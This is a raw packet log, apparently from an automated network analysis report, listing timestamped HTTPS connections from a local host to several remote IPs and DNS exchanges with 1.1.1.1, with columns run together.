                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821753025 CET4435008452.212.192.25192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821787119 CET50084443192.168.2.552.212.192.25
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821798086 CET4435008452.212.192.25192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821818113 CET4435008452.212.192.25192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821821928 CET50084443192.168.2.552.212.192.25
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821839094 CET50084443192.168.2.552.212.192.25
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.821866035 CET50084443192.168.2.552.212.192.25
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.822467089 CET50084443192.168.2.552.212.192.25
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.822475910 CET4435008452.212.192.25192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.007489920 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.007543087 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.007616997 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.007808924 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.007839918 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.117285967 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.117346048 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.117413998 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.117619991 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.117650032 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.578360081 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.578380108 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.578493118 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.578600883 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.578612089 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.196429014 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.196640968 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.196656942 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.197506905 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.197588921 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.204628944 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.204689026 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.204956055 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.204965115 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.255847931 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.428813934 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.431054115 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.431087017 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.434350014 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.434417963 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.434753895 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.434842110 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.434853077 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.475370884 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.479990959 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.480050087 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.500046968 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.500278950 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.500300884 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.501769066 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.501837015 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.502634048 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.502720118 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.502752066 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.528085947 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.543373108 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.544188976 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.544249058 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.592144012 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.943891048 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.944088936 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.944097042 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.945535898 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.945641994 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.946341038 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.946405888 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.946410894 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.946419001 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958297014 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958359957 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958380938 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958430052 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958471060 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958523035 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958631039 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958631039 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958631039 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958776951 CET50104443192.168.2.552.210.83.154
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.958803892 CET4435010452.210.83.154192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.992404938 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.992413998 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.013483047 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.013642073 CET4435010663.140.62.17192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.013710022 CET50106443192.168.2.563.140.62.17
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.040314913 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452249050 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452269077 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452275991 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452285051 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452310085 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452327013 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452342033 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452368975 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.452403069 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.508832932 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.508903980 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.508924961 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.508965969 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.508977890 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.509016991 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.509016991 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.509074926 CET4435011152.210.126.164192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.509180069 CET50111443192.168.2.552.210.126.164
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.537002087 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.581290007 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625780106 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625787973 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625853062 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625864983 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625902891 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625931978 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.625943899 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.679824114 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.679838896 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.679898024 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.679910898 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.679949045 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.692995071 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.693063974 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.800662041 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.800733089 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.800744057 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.800800085 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.809190035 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.809252024 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.837374926 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.837389946 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.837449074 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.837459087 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.837500095 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.860908985 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.860924006 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.860965967 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.860976934 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.861006975 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.861021996 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922261953 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922276974 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922332048 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922341108 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922362089 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.922382116 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.997103930 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.997119904 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.997404099 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.997414112 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.997931004 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.011837006 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.011851072 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.011979103 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.011987925 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.012053967 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.018374920 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.018510103 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.018517971 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.030618906 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.030693054 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.030742884 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.030754089 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.030782938 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.043234110 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.043251038 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.043350935 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.043350935 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.043364048 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.057480097 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.057492018 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.057725906 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.057735920 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070537090 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070559978 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070594072 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070602894 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070616007 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070627928 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.070885897 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.072324991 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.118192911 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.118207932 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.118326902 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.118335962 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.118391037 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185103893 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185126066 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185149908 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185183048 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185194969 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.185218096 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.193797112 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.193814993 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.193852901 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.193865061 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.193880081 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.194928885 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.194991112 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.194999933 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.203115940 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.203130007 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.203211069 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.203221083 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.213792086 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.213860989 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.213871956 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.213892937 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.213948011 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.219847918 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.219861984 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.219942093 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.219943047 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.219954967 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.221162081 CET4435009618.66.161.117192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:05.221213102 CET50096443192.168.2.518.66.161.117
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:37.893359900 CET53528261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:38.012492895 CET53544221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:40.631755114 CET53574061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.170589924 CET5511153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.170728922 CET5671753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.309104919 CET53551111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.309142113 CET53567171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:43.767750978 CET4924453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:43.768033981 CET5302553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET53492441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.217327118 CET53530251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.924654961 CET6360753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.924906969 CET5031653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.925534010 CET5842953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.925720930 CET6334953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.930690050 CET5284653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.930879116 CET6052853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.061824083 CET53503161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.062686920 CET53633491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.063071966 CET53584291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.067673922 CET53528461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.067814112 CET53605281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.128957033 CET53636071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.208965063 CET5232453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.209130049 CET5132553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.300762892 CET5620653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.300923109 CET5709753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.345719099 CET53513251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.346570015 CET53523241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437506914 CET53562061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437721968 CET53570971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.772715092 CET5149353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.772999048 CET5397753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.816859007 CET6301953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.817023993 CET6440353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.910507917 CET53514931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.930699110 CET53539771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.953988075 CET53644031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.955388069 CET53630191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.621243000 CET6034353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.621481895 CET4972853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.758347988 CET53603431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.758507013 CET53497281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:57.716958046 CET53558801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:09.408395052 CET5896753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:09.408521891 CET5898753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:10.022398949 CET53589871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:10.022460938 CET53589671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.572352886 CET5877353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.572513103 CET5080453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.710129976 CET53587731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.710599899 CET53508041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:16.415699959 CET53593151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:37.541229963 CET53601061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.070631027 CET6537253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.070776939 CET6207253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.117603064 CET53581431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.603418112 CET5275953192.168.2.51.1.1.1
